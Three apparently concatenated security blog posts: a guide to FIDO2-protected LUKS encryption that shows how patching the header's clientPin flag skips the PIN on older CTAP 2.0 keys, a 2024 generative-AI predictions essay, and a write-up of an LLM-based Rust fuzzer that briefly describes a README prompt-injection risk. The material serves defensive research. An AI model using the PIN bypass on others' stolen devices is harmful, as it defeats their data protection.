
FIDO2 security keys offer a versatile range of user authentication options. We have explored some of these possibilities during a workshop we presented at ph0wn. This post delves deeper into setting up disk encryption with LUKS safeguarded by a security key. We also explain the underlying mechanics and highlight pitfalls to avoid.
LUKS is a common solution to encrypt block devices like solid-state drives in Linux ecosystems. Basically it works by leaving a header unencrypted before the encrypted devices with all the necessary information to decrypt the following device. This header contains information to derive a key used to decrypt a binary key slot area. In the key slot, a master key is then used to decrypt or encrypt the whole device. A well known tool to manage encrypted devices is cryptsetup. It allows to setup and manage encryption of devices. For example, to create a LUKS device the subcommand luksFormat can be used on a file or on a block device. This command formats completely your device, thus, it has to be used carefully:
$ cryptsetup luksFormat disk.img
WARNING!
========
This will overwrite data on disk.img irrevocably.
Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for disk.img:
Verify passphrase:cryptsetup requests a passphrase which will be used for device encryption and decryption. Then our file disk.img is formatted and encrypted. We can simply open it with the open command:
$ sudo cryptsetup open disk.img encrypted
Enter passphrase for disk.img:
$ lsblk
...
loop23 7:23 0 30M 0 loop
└─encrypted 254:0 0 14M 0 crypt
...Now, let’s see now how we can replace the passphrase by a security key.
FIDO2 introduces a standardized communication protocol known as Client-to-Authenticator Protocol (CTAP), which defines the exchange of information between security keys, also referred as authenticators, and the operating system or web browser. The current version is 2.1 and a new version 2.2 is published as a Review Draft. This standard is often used to authenticate users and get rid of passwords as it was already explained in one of our previous blog post.
For LUKS disk encryption, a CTAP extension called “hmac-secret” is used. This extension extends the behavior of the CTAP commands authenticatorMakeCredential and authenticatorGetAssertion, allowing to obtain a symmetric key for LUKS key slot decryption. You can verify if your authenticator supports the hmac-secret extension with the get_info.py example script of the Yubico python-fido2 library. This script uses the authenticatorGetInfo CTAP command to retrieve the authenticator information. For example, this is the output of the script when using the Ledger Nano X together with the Security key application:
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw7')
Product name: Ledger Nano X
Serial number: 0001
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0'], extensions=['hmac-secret', 'txAuthSimple'], aaguid=AAGUID(fcb2bcb5-f377-078c-6994-ec24d0fe3f1e), options={'rk': True, 'up': True, 'uv': True, 'clientPin': False}, max_msg_size=1024, pin_uv_protocols=[1], max_creds_in_list=None, max_cred_id_length=None, transports=[], algorithms=None, max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=None, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
Device does not support WINKThis indicates that the device adheres to the CTAP 2.0 standard and supports the hmac-secret extension.
During the CTAP authenticatorMakeCredential command, if a hmac-secret parameter is present, the authenticator creates a credential ID and, in addition, generates a 32-bytes of random called CredRandom. To enroll a security key to a LUKS device, systemd offers a convenient tool called systemd-cryptenroll. This tool can be used to enroll the authenticator using the hmac-secret extension. Again, this following command will wipe previous slots and thus have to be used with caution:
$ systemd-cryptenroll --fido2-device=auto --wipe-slot=all test.img
🔐 Please enter current passphrase for disk /home/luks/test.img: (press TAB for no echo)********
Initializing FIDO2 credential on security token.
👆 (Hint: This might require confirmation of user presence on security token.)
🔐 Please enter security token PIN: ********
Generating secret key on FIDO2 security token.
👆 In order to allow secret key generation, please confirm presence on security token.
New FIDO2 token enrolled as key slot 1.
Wiped slot 0.Lets look at the new LUKS header of our device after the security key enrollment:
$ cryptsetup luksDump test.img
LUKS header information
Version: 2
Epoch: 6
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: df8d4f98-2e1e-4342-befb-edf4bfa3e5a8
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)
Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 4096 [bytes]
Keyslots:
1: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: pbkdf2
Hash: sha512
Iterations: 1000
Salt: 2e 93 59 1b 94 e1 df 30 2a 98 15 10 f1 5c b5 19
89 65 d4 fd 2f 58 ac 02 68 8b cc 42 07 0b 99 12
AF stripes: 4000
AF hash: sha512
Area offset:290816 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
0: systemd-fido2
fido2-credential:
db 76 b3 fc 9d d0 18 e5 1e ec f0 53 2b ed e9 8b
b7 70 73 85 fd 4f 16 d5 7c dc 21 1c 2c 8f 12 e7
29 f7 a1 22 05 5b e0 43 e4 45 23 55 33 88 6d 34
89 03 9b 2c 77 92 1a 87 6e e5 24 23 2f 40 05 e6
fido2-salt: 95 11 36 b7 b1 93 54 42 0f 4f 79 95 4e e4 77 d1
f9 e0 d7 7a f1 37 fd 49 ab 04 6c f0 cd d9 7b 8a
fido2-rp: io.systemd.cryptsetup
fido2-clientPin-required:
true
fido2-up-required:
true
fido2-uv-required:
false
Keyslot: 1
Digests:
0: pbkdf2
Hash: sha256
Iterations: 326455
Salt: ac 17 58 50 09 95 09 c8 bc e5 fd d3 03 50 8f 98
c9 76 55 2b e7 fc 45 09 d4 c8 4b ce b2 12 30 79
Digest: ab 67 ee 89 09 45 4f ba 80 35 1a f0 a1 0b e0 ae
8b e9 82 8f 72 7b 6a 54 b5 6a 43 91 aa 0a 6c feWe can see we have a token associated with the key slot 0. This token has a fido2-credential, the credential id which allows to reconstruct everything needed at the security key side including the value of CredRandom. Nothing is stored on the security key, thus is has to be stored in the LUKS header.
Then to generate a secret, the command CTAP authenticatorGetAssertion is used. A shared secret between the security key and the host is obtain with computing a Diffie-Hellman key agreement between the host on the security key. The shared secret is used as a key to encrypt and authenticate a salt chosen by the host and embedded within the fido2-salt field of the LUKS header. The encrypted salt is sent to the security key which will verify the authenticity of the salt and decrypt it. Then the autenticator generates a secret output being the HMAC of the previously generated CredRandom and the :
output = HMAC-SHA-256(CredRandom, salt)
It is returned encrypted to the host. Once decrypted, cryptsetup uses this secret to decrypt the key slot associated. Practically, when you want to decrypt the LUKS image cryptsetup would need your authenticator and your PIN code to reconstruct the secret output:
$ sudo cryptsetup open --token-only image.img encrypted
Enter token PIN:
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.Since a part of the secret, CredRandom is only recoverable by the security key, it is not possible to decrypt the device without it.
CTAP employs a parameter called clientPin during the credential creation. When set to True, this indicates that a PIN code has been configured on your authenticator, and you will be prompted for this PIN for future credential generation. If you have not established a PIN code and enroll your security key without setting clientPin to True, the PIN code will never be required for device decryption, even if you configure one later. This arrangement is suitable for devices like the Ledger wallet, which necessitates a separate PIN code for device initiation. However, for other authenticators, this poses a potential issue, as anyone who steals both the device and the authenticator could decrypt your data without requiring your PIN code.
There is another issue as well. If the clientPin was set but a authenticatorGetAssertion request is made without the PIN code, CTAP 2.0 specifies:

This implies that if the pinAuth parameter is omitted, a ‘uv’ bit is set to 0 meaning that the user verification was not made by the authenticator. However, the CTAP specification does not explicitly state whether the hmac-secret extension should return the secret based on the ‘uv’ bit. To investigate this behavior, we conducted experiments on various authenticators. We initiated the test on a Solo key running an outdated firmware version (3.0.0):
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw6')
Product name: SoloKeys Solo 3.0.0
Serial number: 2060469E55B9
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0'], extensions=['hmac-secret'], aaguid=AAGUID(8876631b-e4a0-428f-5784-0ac71c9e0279), options={'rk': True, 'up': True, 'plat': False, 'clientPin': True}, max_msg_size=1200, pin_uv_protocols=[1], max_creds_in_list=None, max_cred_id_length=None, transports=[], algorithms=None, max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=None, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
WINK sent!This authenticator supports CTAP 2.0 with the hmac-secret extension and it has the client PIN already set. Then we enroll our key to a LUKS device as previously and we obtain the same header as before. But then in the LUKS header we patched the value fido2-clientPin-required to False. Since the header as a checksum mechanism we created a script to handle all the operation and it is available here. Then after we patched the header we can verify everything is fine:
$ cryptsetup luksDump test.img
LUKS header information
Version: 2
Epoch: 6
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: 7a8cc432-f3ef-48de-9644-74e7d6c81d6a
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)
Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 4096 [bytes]
Keyslots:
1: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: pbkdf2
Hash: sha512
Iterations: 1000
Salt: b7 ed 7b 10 20 c4 d6 65 cc 59 5c 64 16 9c 1e b4
22 33 63 09 a1 1f fc f4 5b 77 79 02 81 47 7d 35
AF stripes: 4000
AF hash: sha512
Area offset:290816 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
0: systemd-fido2
fido2-credential:
1e 51 5b 40 ac cb 0f d0 da e3 eb 5f 20 f9 1c aa
c3 16 f6 3c a4 00 ad ca 21 ab 64 ef e5 a3 03 ac
4b 42 3b a2 a1 21 ff 04 55 14 ab e1 b8 2a 95 99
df d9 be 3c 43 64 db 0d 6c d0 10 00 d7 29 10 1a
ba 8f 87 02 00 00
fido2-salt: bc 34 af d7 bd 50 0b 9a 8a 7f 63 51 a6 fb d3 77
36 34 ce 2a c0 26 e7 bf 49 b3 1b 31 d3 3b 11 46
fido2-rp: io.systemd.cryptsetup
fido2-clientPin-required:
false
fido2-up-required:
true
fido2-uv-required:
false
Keyslot: 1The field fido2-clientPin-required is set to False. And if we try to open our device:
$ sudo cryptsetup open --token-only test.img encrypted
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.Surprise! in this case, no PIN code is request but the device is decrypted correctly. This is a security issue as explained before if someone is able to steal you disk and you security key. This behavior is not generalized to all auhtenticators. We have tested a Yubikey having the firmware version 5.1.1 and it turned out that the key would not allow to answer the secret even if the fido2-clientPin-required is set to False.
The previous flaw was rectified in later CTAP versions, starting from CTAP 2.1. These updates introduced a change where the security key generates two distinct secrets during the authenticatorMakeCredential command: CredRandomWithUV and CredRandomWithoutUV. During the command execution, the authenticator determines whether to utilize CredRandomWithUV or CredRandomWithoutUV as the CredRandom for secret generation based on whether user verification was performed in the preceding steps. Let’s observe how a newer security key behaves in practice. We’ve selected a newer YubiKey 5 NFC as our example.
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw5')
Product name: Yubico YubiKey OTP+FIDO+CCID
Serial number: None
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0', 'FIDO_2_1_PRE'], extensions=['credProtect', 'hmac-secret'], aaguid=AAGUID(2fc0578f-8553-48ea-b11f-ba5a8fb9213a), options={'rk': True, 'up': True, 'plat': False, 'clientPin': True, 'credentialMgmtPreview': True}, max_msg_size=1200, pin_uv_protocols=[2, 1], max_creds_in_list=8, max_cred_id_length=128, transports=['nfc', 'usb'], algorithms=[{'alg': -7, 'type': 'public-key'}, {'alg': -8, 'type': 'public-key'}], max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=328707, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
WINK sent!The field 'FIDO_2_1_PRE indicates that the authenticator supports partially the CTAP 2.1 protocol. Then, as previously, we enrolled our key to the disk image and we patched the LUKS header with our script and finally, we tried to open the image with cryptsetup:
$ sudo cryptsetup open --token-only test.img encrypted
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
It seems we have the same problem as before. However, the device is not open properly and if we ask cryptsetup to be more verbose we can understand the problem:
$ sudo cryptsetup open --token-only test.img encrypted --debug
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
# Trying to open keyslot 1 with token 0 (type systemd-fido2).
# Trying to open LUKS2 keyslot 1.
# Running keyslot key derivation.
# Reading keyslot area [0x47000].
# Acquiring read lock for device test.img.
# Verifying lock handle for test.img.
# Device test.img READ lock taken.
# Reusing open ro fd on device test.img
# Device test.img READ lock released.
# Verifying key from keyslot 1, digest 0.
# Digest 0 (pbkdf2) verify failed with -1.
# Releasing crypt device test.img context.
# Releasing device-mapper backend.
# Closing read only fd for test.img.
Command failed with code -2 (no permission or bad passphrase).
# Unloading systemd-fido2 token handler.The key slot verification failed and that’s coherent with the usage of the value CredRandomWithoutUV which differs from CredRandomWithUV in CTAP 2.1 and would lead to a different secret generation.
This update is now implemented in the latest solo key firmware but some authenticators may not be upgradable and thus it is better to check the version of CTAP supported by your authenticator before setting up disk encryption.
FIDO2 security keys offer a convenient and secure method for unlocking LUKS encrypted disks. However, it’s crucial to understand the underlying mechanisms and potential pitfalls to ensure optimal protection. To safeguard your data, it’s essential to utilize FIDO2 security keys with the latest CTAP version and ensure proper credential creation procedures, including user verification when applicable.
f you know me, you’ll know I’m not a fan of making tech predictions. It’s just not possible to consider the complexities of the world and the bucket of other unknowns. We also tend to be far more confident in our predictions. Humans, right? However, looking at some current trends leads to some pretty probable predictions. Besides, our marketing department loves predictions, so here is a Hunter S. Thompson style tagline of written under duress.

I want to take a different approach with these predictions than the typical hype-laden AI predictions (guesses) you typically see. I’ve added some context and food for thought with each prediction. I hope this is more enlightening than dropping a few bullet points.
Here is what I believe is in store for 2024.
If you thought ChatGPT was causing your organization problems, it will get worse. In June, I started touching on this topic with my More than ChatGPT: Privacy and Confidentiality in the Age of LLMs post. It’s relatively easy for anyone to copy and paste some Python code and send data to an API. This post was before the announcement of GPTs, Microsoft’s Copilot Studio, and maybe whatever Amazon’s Q is supposed to be. These provide a better interface with more bubble wrapping. There’s no doubt more of these tools are on the horizon from other providers, and the complete reduction of friction is the goal.
The value proposition of these tools is allowing non-developers to use natural language to program new applications and deploy them for themselves or others. I like the spirit of empowering everyone at the company to create tools and solve problems, but there’s a reason we don’t let everyone at the company build and ship code. Non-developers aren’t accustomed to building and deploying software, much less knowing about issues with data and evaluating the output of software built. Even if these applications aren’t deployed outside of an organization (many may not be), they could expose data to compromise, lead to bad business decisions, and possibly put the organization in violation of regulatory compliance. The fact that they may be insecure is almost beside the point; the real problem is that security teams and the organization as a whole won’t know about them in the first place.
Many organizations continue to struggle with their more traditional development security challenges; now, many will have to worry about a new landscape of applications distributed across an organization. Most organization’s processes and approaches are entirely inadequate for what’s on the horizon. Much of this functionality is billed more as Excel on steroids vs. a development team pushing new software, but it’s still early. The time to prepare is now.
We’ve reached a point where just asking questions turns into code execution. Exciting.
The most significant hurdle to Generative AI adoption is the lack of appropriate business use cases. This is according to a November 2023 O’Reilly Radar Report titled Generative AI in the Enterprise. In addition, once you’ve identified a use case, operationalizing and getting it into production is another challenge. Use cases rarely operationalize as easily as the tutorials make it seem, and unexpected pitfalls tank the project.
Solutions often work in small tests, and the real problems don’t present themselves until they get launched into production and are confronted with the complexities of the real world. Before the generative AI craze, it was known that most AI experiments don’t make it into production, but for some reason, people treat generative AI as the exception.
The biggest companies in the world are struggling to operationalize these technologies in their environments, so we should expect this trend to continue to be a challenge into 2024.
Imagine a world where you never know why any files are being accessed, you never know why your data is being sent anywhere, and you never know why code is changing and executing. You haven’t entered the Security Twilight Zone. You’ve entered our very near future. There’s a relentless push by vendors to “AI” everything and drive integration deeper into systems. What we tend to forget is that these technologies are experimental. We haven’t even found all of the issues with them yet and don’t have fixes for all the issues we’ve found, but every day, production pushes them deeper into systems.
Zooming out, there is a change in attack surface as systems that can be manipulated are integrated into previously robust applications. Allowing attackers to exert far greater control over these applications and manipulate them in unexpected ways.
Beyond security, there is a very real danger to privacy. Deep learning approaches are data-hungry, and there’s a temptation to use what you have access to. LLMs are typically worse for privacy because, most often, you need to be able to see the plaintext request and response to evaluate the quality of the generation. This evaluation, in many cases, is done by a human. Even when privacy protections exist in one product, it may not be the case in other product offerings from the company. So, it’s essential to keep an eye on the scope of these in your usage agreements and terms of service.
Impacts on security and privacy remain situational and depend on the use case. But the deeper the integration into products almost assures an elevated impact by the very nature of the depth of the integration. A whole lot of compromises will happen, and data will be lost and many will claim they never saw it coming. 🤷♂️
This prediction may be stretching it for 2024. We are still deep in the hype.
When GPT-5 lands, it won’t be much better than GPT-4 and far from majorly better. With all of the hype and speculation around GPT-5 having near-AGI capabilities, the reality will surely be a letdown to the AI hype machine. We’ve reached a limit with the current LLM approaches, and bigger only buys you so much. So, without some new innovation, we are stuck relatively where we are. It’s possible that tweaks and additional modalities may make GPT-5 more useful for certain tasks, but not in a generalizable way.
I saw this image being passed around if you are looking for a visual aid.

You can get a glimpse of this by looking at the current landscape of the various LLMs that have been released. It seems everyone is releasing an LLM, and none of them are substantially better than any other one. Sure, some may perform better at certain tasks, have additional modalities, or have been trained and fine-tuned differently, but they are all relatively the same.
The dirty little secret of Generative AI is the environmental costs, and it’s getting almost no attention. People railed against the negative environmental impacts of Proof of Work cryptocurrencies (and still are), but the same people are now silent on the environmental impacts of AI. Some of this is partly due to the fact that using these tools abstracts the user from the real costs of their transactions.
The following is from an AP news article covering the topic.
Ren’s team estimates ChatGPT gulps up 500 milliliters of water (close to what’s in a 16-ounce water bottle) every time you ask it a series of between 5 to 50 prompts or questions. The range varies depending on where its servers are located and the season. The estimate includes indirect water usage that the companies don’t measure — such as to cool power plants that supply the data centers with electricity.
This usage can also be particularly impactful when it happens during a drought.
Another new paper, Power Hungry Processing ⚡️Watts ⚡️ Driving the Cost of AI Deployment, also dives into this issue. This paper confirms a couple of assumptions that you may already have.
It’s certainly something to consider before participating in the next AI-generated viral meme trend.
There are other sustainability factors at play as well. As long as there is little transparency and organizations rely on subsidies from big tech companies, the true cost of running these models isn’t known. It’s important for the sustainability of the service to know if you are paying $10 a month for a service that costs the company $30 a month to offer you. This is something Clem Delangue CEO of Hugging Face, calls “cloud money laundering.” This has an impact on organizations looking to deploy Generative AI solutions because the cost to deploy and maintain a service could skyrocket, making it less attractive or infeasible.
In 2024, this topic will start to be part of the public conversation, potentially creating a more precise understanding and additional research about the actual cost of the technology. I don’t expect any significant changes to happen in 2024, but having a better understanding can lead to proposed plans to help offset the impact.
If there is one prediction that I can make with 100% confidence, it’s that the goalposts will move. First was the access to the API; then, it was GPT-4; then, it was multi-modality; and now, it’s GPT-5, which will completely transform the world and be more impactful than the printing press.
It’s useful to remember that technology doesn’t have to be earth-shattering to be useful. We don’t need AGI to solve problems. I mentioned recently that I find my car’s driver assistance and safety features incredibly helpful, despite not having a self-driving car. I think we should be looking at AI technology the same way.
Many people and organizations are doing cool things with the technology today. It doesn’t have to be the new printing press to make an impact. So, stop hyping and start using.
Due to the factors outlined in this post and a variety of other factors, in 2024, we should see the hype around generative AI start to cool as certain realities set in and investors start asking tougher questions. This doesn’t mean AI is dead, far from it. Technologies under the AI umbrella are already part of our daily lives, and there will be continued advancements leading to solved problems.
Ultimately, we should prepare to be surprised. So many people are working in the area there are bound to be surprises. It’s time to start thinking critically about how we look at and deploy AI technology in our environments to ensure the right steps are taken to protect our assets. So, here’s to 2024.
In August 2023, Google published research they did on AI-powered fuzzing. They showed they could automatically improve fuzzing code coverage of C/C++ projects already enrolled in OSS-Fuzz thanks to AI. They found that for 14/31 (or 45%) of the projects on which this research was conducted, generated fuzz targets successfully built.
This research inspired us, and we thought we could expand on this work and bring something new to the table. Previous research started with projects that already did fuzzing. Indeed, all projects enrolled in OSS-Fuzz have at least one existing working fuzz target, and this is what was used in the above research to build prompts. We wanted to go a step further and be able to start fuzzing projects completely from scratch when no working fuzz target examples for the project under test already exist.
To maximize success, we decided to focus on projects written in Rust. Not just because we love Rust. It’s because of the high consistency in project structure usually observed in projects written in that language. Indeed, most projects use Cargo as their build system, and that minimizes fragmentation in the Rust ecosystem. There are many assumptions that can be made about a Rust code base because its easy to know how to build it, where to find unit tests, examples, and its dependencies.
With that into consideration, it was time to build something that would be capable of automatically fuzzing Rust projects from scratch, even if these projects didn’t do any fuzzing at all.
We built Fuzzomatic, an automated fuzz target generator and bug finder for Rust projects, written in Python. Fuzzomatic is capable of generating fuzz targets that successfully build for a Rust project, completely from scratch. Sometimes the target will build but it won’t do anything useful. We detect these cases by evaluating whether the code coverage increases significantly when running the fuzzer. In successful cases, the target is going to do something useful, such as calling a function of the project under test with random input. It will also sometimes automatically find panics in the code base under test. The tool reports whether the generated target successfully builds and whether a bug was found.
Fuzzomatic relies on libFuzzer and cargo-fuzz as a backend. It also uses a variety of approaches that combine AI and deterministic techniques to achieve its goal.
We used the OpenAI API to generate and fix fuzz targets in our approaches. We mostly used the gpt-3.5-turbo and gpt-3.5-turbo-16k models. The latter is used as a fallback when our prompts are longer than what the former supports.
The output of the first step is a source code file: a fuzz target. A libFuzzer fuzz target in Rust looks like this:
#![no_main]
extern crate libfuzzer_sys;
use mylib_under_test::MyModule;
use libfuzzer_sys::fuzz_target;
fuzz_target!(|data: &[u8]| {
// fuzzed code goes here
if let Ok(input) = std::str::from_utf8(data) {
MyModule::target_function(input);
}
});This fuzz target needs to be compiled into an executable. As you can see, this program depends on libFuzzer and also depends on the library under test, here “mylib_under_test”. The “fuzz_target!” macro makes it easy for us to just write what needs to be called, provided that we receive a byte slice, the “data” variable in the above example. Here we convert these bytes to a UTF-8 string and call our target function and pass that string as an argument. LibFuzzer takes care of calling our fuzz target repeatedly with random bytes. It measures the code coverage to assess whether the random input helps cover more code. We say it’s coverage-guided fuzzing.
Once we have generated a fuzz target, we try to compile it. If it compiles successfully, that’s great, and we run the compiled executable for a maximum of 10 seconds. We capture the standard output (stdout) of the fuzz target and evaluate whether code coverage changes significantly. If that’s the case, we can be quite confident that the fuzz target is doing something useful. We say that the target is “useful” in that case. Indeed, if we generate an empty fuzz target or one that calls a function with a constant or that doesn’t use the random input at all, the code coverage shouldn’t vary too much. This may not be 100% accurate, but we found that it’s a good enough metric.
We also detect when the fuzzer crashes. When that happens, we have a look at the stack trace in the standard output and see whether the crash happened in the fuzz target itself or in the code base under test. If it’s in the code base under test, then we likely found a bug.
If the fuzz target does not build, we feed the compilation errors and the fuzz target to the LLM and ask it to fix the code without modifying its behavior. Applying this technique multiple times usually results in a fuzz target that successfully builds. If not, we move on to the next approach.
To minimize the LLM costs, we turn off compilation warnings and only get errors because warnings do not really help fix the errors and are quite verbose. In addition, the longer the compilation error, the more tokens they would turn into, and the more we would have to pay. Indeed, OpenAI charges per token processed.
At first, the most common compilation error was because of incorrect or missing dependencies. Indeed, the LLM may generate a code snippet that imports a module from the library under test, but this import statement may be incorrect. Alternatively, some import statements may be missing. To minimize dependency issues and reduce the amount of LLM calls, we do two things:
Even with this, we still had compilation errors due to incorrect imports. We significantly reduced that kind of error rate by adding a new approach: the “functions” approach. But first, let’s see what those approaches are.
The approaches we attempt include:
The approaches are attempted one by one, until one works and gives us a useful fuzz target.
This approach is pretty simple. If there’s a README file in the code base, we read its contents and use it to build a prompt for the LLM. In that prompt, we ask the LLM to generate a fuzz target, given the README file.
This approach clearly doesn’t work if the README file only contains installation instructions, for example. If it contains example code snippets that show how to use the library under test, then it is likely to work.
We’ve seen projects where the README contains code snippets that contain errors. For example, one project had not updated the README file in a long time, and it went out of sync with the actual code base. Therefore, the code snippet in the README file would not build. In such cases, this approach may not work either.
The examples approach is similar to the README approach. The only difference is that we use the Rust files in the “examples” directory instead of the README file. The benchmark approach is essentially the same thing, except that it uses the Rust files in the “benches” directory.
We use semgrep to identify pieces of code that have a “#[test]” attribute and feed them to the LLM. We also try to capture the imports and potential side functions that may be defined next to a unit test. We arbitrarily limit this approach to try at most 3 unit tests and not all of them to keep the execution time to reasonable levels. The unit tests that are the shortest are used first to minimize AI costs.
We first obtain a list of all the public functions in the code base under test. This is achieved by running “cargo rustdoc” and asking it to output to JSON format. This is an unstable feature and requires passing some arguments to “rustdoc” to make it work. However, this is a really powerful feature because it gives information straight from the compiler, which would have been much more difficult to accurately obtain with static analysis. We can then parse the generated JSON file and extract all the public functions and their arguments, including their type. In addition to that, we also get the path to the identified function. For example, if we have a library named “mylib” that contains a module named “mymod”, which contains a function “func”, its path would be “mylib::mymod::func”. Rustdoc uses the compiler’s internal representation of the program to obtain accurate information about where each function is located and this is always correct. With this information, we can kiss the import errors we previously had goodbye.
Getting the import path right is one thing, but that won’t produce a useful fuzz target on its own. To get closer to that, we give a score to each function based on the type of arguments it takes, the number of arguments it takes, and the name of the function itself. For example, a function that contains “parse” in its name may be a good target to fuzz. Also, a function that only takes a byte array as input looks like something that would be easy to call automatically. We select the top 8 functions based on their score, and for each of these functions, we try generating a fuzz target that calls that function using a template. If the build fails, we fall back to asking the LLM to fix it.
Another challenge is to convert the random input bytes into the appropriate type the function takes as an argument. This can become even more complicated when a function has multiple arguments of different types.
In that case, we leverage the Arbitrary crate to split those bytes and automatically convert them into the required types the function takes as arguments. This way, we support any combination of arguments of a supported type.
This approach works surprisingly well and is able to produce useful targets most of the time, as long as there is at least one public function with arguments of a supported type.
We ran Fuzzomatic on the top 50 most starred GitHub projects written in Rust that matched the search terms “parser library.” We detected six projects that were already doing some sort of fuzzing and 1 project that was not a Cargo project, so we skipped those. There were also 6 projects that did not build, so these were discarded as well. This left us with 37 projects that were candidates for being processed.
Out of those 37 projects, no approach worked for 2 projects. At least one fuzz target that was compiled successfully was generated for each of the other 35 projects. That’s a 95% success rate.
For only one project, no useful fuzz target was generated. But for 34/37 projects, at least one useful fuzz target was generated. That’s a 92% success rate. We also found at least one bug in 14 projects or 38% of those projects.
The whole process took less than 12 hours. On average, it took 18 minutes to process a project where at least one successful fuzz target was generated. But we’ve seen some take just over two minutes and others take as long as 57 minutes. These numbers cover the whole process, including compilation time.
Considering projects where bugs were found, the “functions” approach was the most successful: 77% of fuzz targets that found a bug were generated using that approach. Next, the README approach worked for 12% of those targets. The examples approach worked for 8% of targets thanks to which bugs were found. Finally, the benchmarks approach worked for 4% of those targets.
When we look at useful generated fuzz targets, the “functions” approach is still the most efficient with 62% of targets generated with that approach. It is followed by the examples approach (13% of useful targets), the unit tests approach (12%), the README approach (10%) and finally the benchmarks approach with 1% of useful targets.
The OpenAI API costs summed up to 2.90 USD, which is quite cheap considering this ran on 50 projects. Usually, it only costs a few cents to run Fuzzomatic on a project.
What kind of bugs did we find? Those 14 bugs were composed of:
Most of the bugs we found were making the software under test crash. But, under some different conditions, this may not be true, depending on how the project is built. Indeed, integer overflows are not checked by default when a Rust program is compiled in release mode. In that scenario, the program would not crash, and may silently produce unexpected behavior that may cause a vulnerability.
We’ve shown that this is possible and worked in most cases, but that’s clearly not the case for every code base out there. Here are some requirements:
If a single top-level item in that list is not fulfilled, then this will likely not succeed.
The results we obtained show that for parser libraries, Fuzzomatic was pretty effective. This strategy can find low-hanging fruit automatically when the right conditions are present, but it won’t be as effective as manually writing a fuzz target with in-depth knowledge of the target code base. However, when it does succeed in finding a bug, it usually does so much faster than it would have taken to get familiar with the code base and manually write a fuzz target for it.
Even if the generated fuzz target does not build, it may still be used as a starting point for manually writing a good fuzz target. Maybe automatically producing a fuzz target that builds did not work, but the fix may be obvious to a person reviewing the generated code. Being able to start from that and not entirely from scratch may save developers a lot of time. Automatically generating a draft fuzz target, which potentially has an import issue but that already calls an interesting function, adds some value, and saves time.
Sometimes, bugs are found, but they may not be exploitable. Even if the bugs found are not directly exploitable, that result in itself provides useful information. Indeed, if some bugs can be found automatically in a code base, it is likely that there is more to be found in that code base, and it opens the path for a more in-depth review of that code base. Also, the bug may not cause any security issues at all, but it’s still nice to fix it anyway.
Fuzzomatic can be used as a defensive measure to protect one’s own open source project. It’s very easy to run. There are only a few requirements that must be respected.
Fuzzomatic focuses on projects written in Rust, so it is required that the target code base is written in that language.
The project must build successfully when running “cargo build”. A project that does not build cannot be fuzzed. This is probably the most important requirement. There are tons of GitHub projects that simply do not build out there.
Functions in your code base should be designed to be tested. One common pitfall we’ve seen in many libraries is exposing a function that takes a path to a file as an argument but not exposing any function that takes the contents of a file directly, for example, as a string or as a byte array. This is an anti-pattern that needs to stop. When designing a library, make sure that your functions are easy to test. This way, automated fuzzing will be much more effective.
Finally, any external non-Rust dependency should already be installed on the system where Fuzzomatic will run. Fuzzomatic currently doesn’t support installing non-Rust dependencies and won’t do it automatically.
To achieve its goal, Fuzzomatic may run untrusted code, so make sure to always run it in an isolated environment. Indeed, it will build untrusted projects. Building untrusted code is a security concern because we never know what’s inside the build script.
Fuzzomatic will also run arbitrary code output by an LLM. Imagine what would happen if, for example, the README file of a project contained malicious instructions, fuzzomatic built a prompt with it and called the LLM. The LLM may respond with a malicious code snippet that would be built and run.
Also, if Fuzzomatic is run against an unknown code base, there is no way to know what the functions that will be called will do. An unknown function may very well delete files or perform other destructive operations.
Therefore, always make sure to run Fuzzomatic in an isolated environment.
Fuzzomatic can run in your CI/CD pipeline. It can also be used once to bootstrap fuzzing for projects that don’t do any fuzzing at all. It saves time and can identify which functions of your codebase should be called and will write the fuzz target for you. In some cases, it will even find runtime bugs in your code, such as panics or overflows.
Fuzzomatic can also be set to run on a large number of projects, hoping to find bugs automatically through fuzzing. We’ve shown that this approach works and found 14 bugs out of 50 parser libraries.
If sending parts of the source code to OpenAI is a problem, fear not. There are plenty of alternatives. We’ve seen that the Mistral 7B instruct model also works, and it can be hosted locally. With tools like LM Studio, a local inference server can be set up in just a few clicks. Then, since that server is API compatible with OpenAI, it’s as easy as setting the OPENAI_API_BASE environment variable to http://localhost:1234/v1, and then Fuzzomatic can run using the model of your choice on your own server. Your code remains private.
There are other approaches we didn’t try or implement. One example is to extract code snippets that are inside docstrings. Many projects include code examples inside multi-line comments that document modules or functions. These examples could be fed to the LLM to generate a fuzz target.
